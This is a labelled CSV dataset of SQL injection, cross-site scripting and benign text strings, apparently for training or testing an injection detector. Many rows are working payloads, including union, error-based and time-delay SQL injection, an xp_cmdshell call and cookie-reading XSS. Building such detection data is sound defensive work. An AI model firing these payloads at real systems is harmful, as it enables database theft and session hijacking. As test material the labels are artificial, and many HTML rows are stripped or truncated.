Payload,Label,text_label,ID Select a paint color for the room.,3,normal,24223 "1%"" ) ) ) union all select null,null,null#",2,SQLi,19275 XSS,1,XSS,8703 "{""id"":null,""name"":""Slowbro""}",3,normal,27101 "",1,XSS,655 "1 ) where 8164 = 8164 or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12447 "select * from users where id = '1' union select ""[""_,version ( ) -- 1'",2,SQLi,16150 XSS,1,XSS,7665 "-1606'|| ( select 'qbaa' where 3967 = 3967 union all select 3967,3967,3967,3967,3967--",2,SQLi,14889
  • ,1,XSS,3236 Select the perfect wedding vows.,3,normal,24411 "1%' or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,15232 "1"" ) as obbk where 6414 = 6414 and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) --",2,SQLi,10942 %3Cimg/src=%3Dx+onload=alert(2)%3D,1,XSS,9308 1'|| ( select 'yezk' where 2097 = 2097,2,SQLi,19763 ORDER BY 26#,2,SQLi,22320 -8515' or 1329 = 9536,2,SQLi,21699 ,1,XSS,8568
    ,1,XSS,2101 1'+ ( select yjyp where 9696 = 9696,2,SQLi,20060 "iif ( 5214 = 7412,1,1/0 )",2,SQLi,21081 1' ) where 1917 = 1917 union all select null#,2,SQLi,19063 "1 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) -- zvkh",2,SQLi,15064 "
    drag me
      drop here
    ",1,XSS,1277 "1%' ) or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11410 "1' ) ) ) or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( ( 'xdui' like 'xdui",2,SQLi,12317 "test",1,XSS,4306 "",1,XSS,712 "When you download the app, you can select your gender.",3,normal,25153 "-6942' ) union all select 7280,7280,7280#",2,SQLi,19392 "=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--",2,SQLi,9905 ,1,XSS,2134 "1%"" ) ) or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) and ( ( ""%"" = """,2,SQLi,15565 1 ) where 3381 = 3381,2,SQLi,21631 "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10",2,SQLi,15236 1 ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( 4703 = 4703,2,SQLi,10755 1' ) ) as hxxm where 3792 = 3792 and sleep ( 5 ) #,2,SQLi,18466 """ or ""a"" = ""a",2,SQLi,22271 "{""id"":null,""name"":""lower troops""}",3,normal,27219 XSS,1,XSS,9057 1'+ ( select twyt where 3376 = 3376 and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) ) +',2,SQLi,10065 "The organizers will select 10 finalists, which will be judged by a panel of seven industry experts.",3,normal,25405 -1385' ) ) ) or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( ( 'mjjd' = 'mjjd,2,SQLi,12367 =+(select*from(select(sleep(5)))a)+',2,SQLi,9916 "1' ) ) ) and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and ( ( ( 'cfhi' like 'cfhi",2,SQLi,12194 "1' ) and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( 'zpzf' = 'zpzf",2,SQLi,11474 1'|| ( select 'awic' where 5227 = 5227,2,SQLi,19709 "Then select write, and the word "" write "" will be appended, preceded by a comma and a space.",3,normal,25344 "Scroll down on the menu and select ""Send a copy.""",3,normal,25703 XSS,1,XSS,8833 "test",1,XSS,4134 "test",1,XSS,4624 "",1,XSS,568 "Click into the Notes Panel, open the notes you want to copy and choose Select All from the Edit menu (or press the Command and A keys) to select all the text.",3,normal,26283 ",1,XSS,6453 Several pharmaceutical companies temporarily froze prices on select drugs last year.,3,normal,25564 Create story.,3,normal,23056 "-4127%' union all select 9558,9558,9558#",2,SQLi,19540 "1 union all select null,null#",2,SQLi,20688 "{""id"":null,""name"":""Dragonfly""}",3,normal,27287 "-2120"" ) union all select 9614--",2,SQLi,20349 1'+ ( select kfmv where 1679 = 1679,2,SQLi,20038 ,1,XSS,7319 ">",1,XSS,1967 McDermott will be questioned by parliament's Treasury Select Committee on Jan.,3,normal,25890 I need to decide where to go for a concert.,3,normal,23799 Can you help me decide where to go for dinner?,3,normal,23862 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8",2,SQLi,17455 "test",1,XSS,2027 "1%' ) ) union all select null,null,null,null,null#",2,SQLi,18431 "1 and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) -- zozj",2,SQLi,15320 or sleep(5)=',2,SQLi,22255 "1%"" and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,15657 "test",1,XSS,4965 "test",1,XSS,4129 -5982' or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and 'ikuh' = 'ikuh,2,SQLi,10597 Report from the Select Committee on Acts respecting insolvent debtors.,3,normal,25757 "test",1,XSS,7684 "1' ) and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,17439 "test",1,XSS,2930 "1"" ) as ltbl where 6395 = 6395",2,SQLi,20631 "",1,XSS,1792 ,1,XSS,6957 "1"" ) where 9248 = 9248",2,SQLi,21492 "-7824"" ) ) ) union all select 3800,3800,3800,3800,3800,3800,3800,3800,3800--",2,SQLi,15507 1'+ ( select ejaj where 1651 = 1651 or 6793 = ( select 6793 from pg_sleep ( 5 ) ) ) +',2,SQLi,14875 "admin"") or (""1""=""1""/*",2,SQLi,21564
      ,1,XSS,7029 "-8686"" where 4532 = 4532 or elt ( 3301 = 9065,9065 ) --",2,SQLi,17799
    1. ,1,XSS,6710 "1 ) as estm where 4809 = 4809 union all select null,null,null--",2,SQLi,16834 They select the winner.,3,normal,24473 "",1,XSS,1595 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--",2,SQLi,14335 "test",1,XSS,4385 XSS,1,XSS,7530 "",1,XSS,702 Where's the nutrition coach?,3,normal,23642 Delete the old bookmarks from your browser.,3,normal,22931 -6487 ) or 6872 = 6872 and ( 7688 = 7688,2,SQLi,19538 "-5109 ) ) ) or make_set ( 6627 = 7331,7331 ) and ( ( ( 9466 = 9466",2,SQLi,16580 "test",1,XSS,4031 "-4068' ) ) ) union all select 9491,9491,9491--",2,SQLi,18940 -7720 ) ) or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( 8254 = 8254,2,SQLi,10638 "
      drag me
      ",1,XSS,766 "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6",2,SQLi,16119 Select your plan.,3,normal,24852 "test",1,XSS,4344 XSS,1,XSS,760 "1"" procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and ""ikhr"" = ""ikhr",2,SQLi,12754 "",1,XSS,6601 "1' ) ) ) or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( ( 'zeum' = 'zeum",2,SQLi,10947 "{""id"":null,""firstName"":""Jimmy"",""lastName"":""Lim"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27612 1 ) as bhdj where 4472 = 4472,2,SQLi,20691 "test",1,XSS,5276 "1%"" ) ) or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,15325 XSS,1,XSS,7206 XSS,1,XSS,2896 "
      test
      ",1,XSS,5048 "select * from users where id = 1 or ""@#"" or 1 = 1 -- 1",2,SQLi,17937 ,1,XSS,4589 "1'|| ( select 'xjcg' from dual where 5815 = 5815 union all select null,null,null#",2,SQLi,15133 "1' ) as nvqk where 3917 = 3917 or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12449 Select your goal.,3,normal,24844 XSS,1,XSS,9248 Select the perfect gift for the occasion.,3,normal,24255 "1"" where 9135 = 9135 and elt ( 4249 = 4249,7259 ) --",2,SQLi,18175 "What do those comments say, and why did you select them?",3,normal,25167 XSS,1,XSS,8701 "{""id"":null,""firstName"":""Kinki"",""lastName"":""Lws"",""address"":""78112 Morris Ave"",""city"":""234"",""telephone"":""3488764909""}",3,normal,27204 "select * from users where id = 1 or 1#""{ union select null,version ( ) -- 1",2,SQLi,15579 x”,1,XSS,7575 XSS,1,XSS,6303 Group data where relevant.,3,normal,23474 "test",1,XSS,2809 end and ( ( ( 'nhub' = 'nhub,2,SQLi,20822 1%' ) ) ) and 3916 = 6327--,2,SQLi,20885 case,3,normal,23148
      XSS
      ,1,XSS,8499 1' ) ) as qgyz where 1547 = 1547 and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --,2,SQLi,15089 "1"" ) ) as vdbf where 7969 = 7969 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) --",2,SQLi,12244 "1"" ) where 7228 = 7228",2,SQLi,21499 ,1,XSS,9181 "If none of these options suit you, you can select ""Custom.""",3,normal,26060 Save up to 30% off select Outdoor Décor and Essentials,3,normal,25722 "From the F o rmat menu, select T abs... The Tabs dialog box is displayed.",3,normal,26164 "",1,XSS,254 "
      test
      ",1,XSS,6863 "
      X",1,XSS,5084 "]]",1,XSS,513 "1%"" ) ) ) and 2006 = 2006",2,SQLi,21139 "1"" ) rlike sleep ( 5 ) and ( ""efoq"" like ""efoq",2,SQLi,18941 -9178' ) or 9779 = 6351,2,SQLi,21339 "1"" ) ) as turj where 1237 = 1237",2,SQLi,20367 "test",1,XSS,3335 Select practice.,3,normal,24724 The party may take months to select a new leader.,3,normal,25402 "
      test
      ",1,XSS,8408 1'|| ( select 'dyuw' from dual where 2037 = 2037,2,SQLi,18798 Select your priority.,3,normal,24886 XSS,1,XSS,9063 "",1,XSS,752 ",if not ( select system_user ) <> 'sa' waitfor delay '0:0:2' --",2,SQLi,16827 -8357' ) ) as henk where 8198 = 8198 or 2558 = 9103#,2,SQLi,18232 <DIV STYLE="width: expression(alert('XSS'));">,1,XSS,2350 "",1,XSS,6076 1 or 6793 = ( select 6793 from pg_sleep ( 5 ) ) # awpq,2,SQLi,17974 "test",1,XSS,8937 Modi nd his Govt have no guts to ban any of these Chinese app.. Citizen of India should Ban Modi Govts misconduct!!. Beware of Shameless and Selective Deshbhakti!!!,3,normal,26492 OR 3409=3409 AND ('pytW' LIKE 'pytY,2,SQLi,20010 1' ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ),2,SQLi,10866 -8639 ) or 8138 = 6252,2,SQLi,21538 """,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,17005 "-6116"" ) ) union all select 3679,3679,3679,3679,3679,3679,3679--",2,SQLi,16793 "test",1,XSS,6943 select sleep ( 5 ) and 'gajm' = 'gajm,2,SQLi,19817 "1"" ) ) and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ( ""opgb"" like ""opgb",2,SQLi,12586 "",1,XSS,1467 "1"" ) union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,15852 "1 ) where 4226 = 4226 or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,17396 "In order to select remedies which should fulfil the indication of producing symptoms like those of the disease, Hahnemann made many observations of the action of drugs on healthy persons.",3,normal,26008 ,1,XSS,2392 I need to select a movie for our movie night.,3,normal,23840 "call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ""%"" = """,2,SQLi,12328 ; exec master..xp_cmdshell,2,SQLi,20942 "-4407"" ) where 2055 = 2055 or elt ( 9714 = 5040,5040 ) --",2,SQLi,17554 "test",1,XSS,8576 Select the right direction for your journey.,3,normal,24034 "`""'>",1,XSS,5299 "-3924'|| ( select 'ssld' from dual where 6229 = 6229 union all select 6229,6229,6229,6229,6229#",2,SQLi,14417 "{""id"":null,""name"":""dance""}",3,normal,27394 "1"" ) where 2764 = 2764 rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) --",2,SQLi,14486 "1' union all select null,null,null--",2,SQLi,19951 "
      XXSS,1,XSS,6820 "1' and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and 'ukxj' = 'ukxj",2,SQLi,12808 "test",1,XSS,3469 Select the perfect wedding officiant.,3,normal,24414 SRC= ,1,XSS,529 "1"" where 2462 = 2462 and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11514 Select develop.,3,normal,24776 "
      test
      ",1,XSS,5470 test",1,XSS,8634

      XSS

      ,1,XSS,8797 %2522%253E%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E,1,XSS,3783 "1 ) ) as henn where 9980 = 9980 or 4915 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,12558 "",1,XSS,431 "While you're still online, select the book you want do download.",3,normal,25132 "test",1,XSS,7683 "1' ) ) ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( ( 'msol' = 'msol",2,SQLi,12426 "-3126 ) ) union all select 6718,6718,6718,6718,6718--",2,SQLi,18089 "1%"" ) ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) and ( ( ""%"" = """,2,SQLi,11874 ,1,XSS,4883 1'|| ( select 'fjlg' from dual where 9517 = 9517,2,SQLi,18700 "
    2. test
    3. ",1,XSS,5145 ý or 1=1 --,2,SQLi,22289 "1' ) ) and elt ( 3053 = 9778,9778 ) and ( ( 'yfaa' like 'yfaa",2,SQLi,17045 "",1,XSS,1228 "select * from users where id = 1 or "", ( "" or 1 = 1 -- 1",2,SQLi,17573 "1' and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and 'qcsi' = 'qcsi",2,SQLi,12691 "1"" ) as lgxc where 1117 = 1117 union all select null,null,null,null,null,null,null,null#",2,SQLi,14787 "<;A HREF="";//google"";>;XSS<;/A>;",1,XSS,9416 "1"" where 6281 = 6281 or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12516 "
      drag me
      drop here",1,XSS,905
      ",1,XSS,1101 1 ) where 9649 = 9649 and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --,2,SQLi,16086 ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4501 = 4501 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ),2,SQLi,10141 Select fail.,3,normal,24675 Check conditions where valid.,3,normal,23305 "test",1,XSS,8629 "
      drag me
      ",1,XSS,1085 "",1,XSS,3606 "1' in boolean mode ) union all select null,null,null,null,null#",2,SQLi,16876 "1 ) where 7881 = 7881 and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12838 "{""id"":null,""name"":""cup""}",3,normal,27304 "
      drag me
      drop here
      ",1,XSS,993 "select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) and ( ( ""%"" = """,2,SQLi,16835 ipt>alert(1)ipt>ipt>alert(1)ipt>,1,XSS,1889 "1"" ) ) as itxo where 7916 = 7916",2,SQLi,20281 or 1=1 --,2,SQLi,22447 ,1,XSS,4761 ,1,XSS,6445 "1'|| ( select 'ersu' where 4123 = 4123 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,12432 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14",2,SQLi,16447 "select * from users where id = 1 or "";."" = 1 or 1 = 1 -- 1",2,SQLi,17345 Where's the guesthouse?,3,normal,23553 "1"" ) and ( 5452 = 6050 ) *6050 and ( ""ciyc"" like ""ciyc",2,SQLi,17946 1 ) where 1100 = 1100 and sleep ( 5 ) --,2,SQLi,19515 "",1,XSS,9100 Select your fight.,3,normal,24918 I often select randomly.,3,normal,24468 "",1,XSS,5491 "1' ) ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and ( ( 'gydh' = 'gydh",2,SQLi,12357 "1"" ) ) ) rlike sleep ( 5 ) and ( ( ( ""qcqx"" like ""qcqx",2,SQLi,17992 "",1,XSS,8141 Insert the car battery.,3,normal,22595 "1' ) ) as jntr where 5051 = 5051 and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) --",2,SQLi,10932 declare,3,normal,23167 "select * from users where id = 1 or ""._"" or 1 = 1 -- 1",2,SQLi,17911 "1"" union all select null,null,null,null,null,null#",2,SQLi,18497 "test",1,XSS,8712 "",1,XSS,7578 ,1,XSS,4053 "
        test
      ",1,XSS,5009 ">

      "">123

      ",1,XSS,3141 Modify text.,3,normal,23097 ![a](javascript:prompt(document.cookie))\,1,XSS,7792 1'+ ( select qugu where 2287 = 2287 order by 1#,2,SQLi,18843 "1' where 9003 = 9003 and make_set ( 5868 = 8316,8316 ) --",2,SQLi,17492 Filter noise.,3,normal,23065 "
        test
      ",1,XSS,4752 "",1,XSS,815 """Donald Trump Won Because of Facebook,"" the blog Select All declared.",3,normal,26466 "test",1,XSS,7886 "1%' ) ) union all select null,null,null#",2,SQLi,19502 XSS,1,XSS,8435 "1' and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )",2,SQLi,13576 "{""id"":null,""name"":""Boldore""}",3,normal,27449 "call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) # cdjm",2,SQLi,12632 "1"" and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ""vukd"" = ""vukd",2,SQLi,11257 union,3,normal,23123 "test",1,XSS,4470 "test",1,XSS,3109 "test",1,XSS,7928 "",1,XSS,2008 1' or sleep ( 5 ) and 'rpqn' like 'rpqn,2,SQLi,19621 Let's discuss where to go for our anniversary dinner.,3,normal,23922 "1 ) and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )",2,SQLi,13334 "-7041"" ) ) ) union all select 2159,2159,2159,2159,2159--",2,SQLi,17715 XSS,1,XSS,8174 "1' ) union all select null,null,null,null,null,null,null#",2,SQLi,17553 "
      test
      ",1,XSS,5966 Where's the best place to try new cuisines?,3,normal,23923 "1"" ) as gjlv where 1983 = 1983 and sleep ( 5 ) #",2,SQLi,18719 "UNION SELECT @@VERSION,SLEEP(5),USER(),4",2,SQLi,19441 or ''=',2,SQLi,22514 "test",1,XSS,4387 Modify game.,3,normal,23051
      XSS
      ,1,XSS,6673 1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (1337=1337,2,SQLi,16906 "1"" ) or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ""zzkc"" = ""zzkc",2,SQLi,11505 "You can search the site easily to find just what you're looking for, narrowing the selection down by features on the left-hand column or select by condition (new, refurbished, etc) on the right side of the page.",3,normal,25092 or 'something' = 'some'+'thing',2,SQLi,20384 Select your argument.,3,normal,24914 "1' and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )",2,SQLi,12238 ‘ or 3=3 --,2,SQLi,22231 "-3347'+ ( select xuzs where 1076 = 1076 union all select 1076,1076,1076,1076,1076--",2,SQLi,15033 "test",1,XSS,8697 1' ) ) ) and 1743 = 6793 and ( ( ( 'rgcv' = 'rgcv,2,SQLi,18614 Where's your SQL familiarity?,3,normal,23399 "test",1,XSS,5274 1 ) as azoo where 8933 = 8933 and ( 3020 = 3020 ) *6703--,2,SQLi,17486 Where's the field?,3,normal,23540 "
      test
      ",1,XSS,2576 ,1,XSS,6502 "1 ) as ndgd where 2367 = 2367 or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,14117 "-5294%"" ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ""%"" = """,2,SQLi,10029 "",1,XSS,5863 "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5",2,SQLi,16352 "1' where 4149 = 4149 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,14211 1 ) ) as ogcv where 4396 = 4396,2,SQLi,20444 "1' ) ) union all select null,null,null#",2,SQLi,19655 -3867%' ) or 3084 = 5633 and ( '%' = ',2,SQLi,19786 declare @q nvarchar ( 200 ) select @q = 0x770061 ...,2,SQLi,18158 "
      //[""'`-->]]>]
      x
      //[""'`-->]]>]
      //[""'`-->]]>]
      //[""'`-->]]>]
      //[""'`-->]]>]
      //[""'`-->]]>]
      //[""'`-->]]>]
      &x;//[""'`-->]]>]
      //[""'`-->]]>]
      //[""'`-->]]>]
      //[""'`-->]]>]
      //[""'`-->]]>]
      //[""'`-->]]>]
      //[""'`-->]]>]
      ",1,XSS,6 Carefully select the options.,3,normal,24289 ( select * from ( select ( sleep ( 5 ) ) ) srmq ) and ( ( ( 'pfle' like 'pfle,2,SQLi,15454 "1' ) ) ) and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( ( 'dsok' = 'dsok",2,SQLi,10939 Select your transform.,3,normal,25040 "<A HREF=\""http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\"">XSS</A>",1,XSS,1867 ,1,XSS,4091 "1 ) ) and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,13108 "d=\""alert('XSS');\\"")\"";",1,XSS,9714 "select * from users where id = 1 or 1#""{ union select 'a',version ( ) -- 1",2,SQLi,15711 "1'|| ( select 'asfl' from dual where 5846 = 5846 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,12114 "",1,XSS,1570 select name from syscolumns where id = ( sele ...,2,SQLi,18548 "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--",2,SQLi,12205 "-9389' where 5713 = 5713 union all select 5713,5713,5713,5713,5713,5713,5713,5713--",2,SQLi,15048 "select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) )",2,SQLi,16227 ORDER BY 2,2,SQLi,22417 1' where 2547 = 2547 and 6969 = ( select 6969 from pg_sleep ( 5 ) ) --,2,SQLi,16165 ET. Call Me By Your Name is now in select theaters.,3,normal,26216 """,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*",2,SQLi,15006 declare @q nvarchar (200) select @q = 0x770061 ...,2,SQLi,18414 "test",1,XSS,9083 "
      drag me
      drop here",1,XSS,1066 "1'|| ( select 'ltqo' where 9080 = 9080 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) ) ||'",2,SQLi,13186 )))) waitfor delay '0:0:20' /*,2,SQLi,20512 "1%' ) ) ) union all select null,null,null,null,null,null,null,null,null--",2,SQLi,15878 `'>,1,XSS,5310 Sort the tangled cables.,3,normal,22738 <~/XSS STYLE=xss:expression(alert('XSS'))>,1,XSS,7336 "'XSS');"">",1,XSS,6108 "-3063%"" ) ) ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( ( ""%"" = """,2,SQLi,9987 "",1,XSS,334 "",1,XSS,3991 "When it comes time to pay, select the payment plan option.",3,normal,25159 "{""id"":null,""name"":""Hyena""}",3,normal,27266 "",1,XSS,3694 "",1,XSS,6869 "",1,XSS,7465 "1"" ) as tnux where 4888 = 4888 rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #",2,SQLi,14777 "1"" or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )",2,SQLi,13842 "1'|| ( select 'tdcr' where 6792 = 6792 union all select null,null,null,null,null#",2,SQLi,15159 "1' ) ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( 'hpbt' = 'hpbt",2,SQLi,12611 ,1,XSS,4637 ,1,XSS,2744 "
      test
      ",1,XSS,6143 "test",1,XSS,3763 SELECT pg_sleep(5);,2,SQLi,21925 "{""id"":null,""firstName"":""Arthas"",""lastName"":""Lee"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27430 "
      test
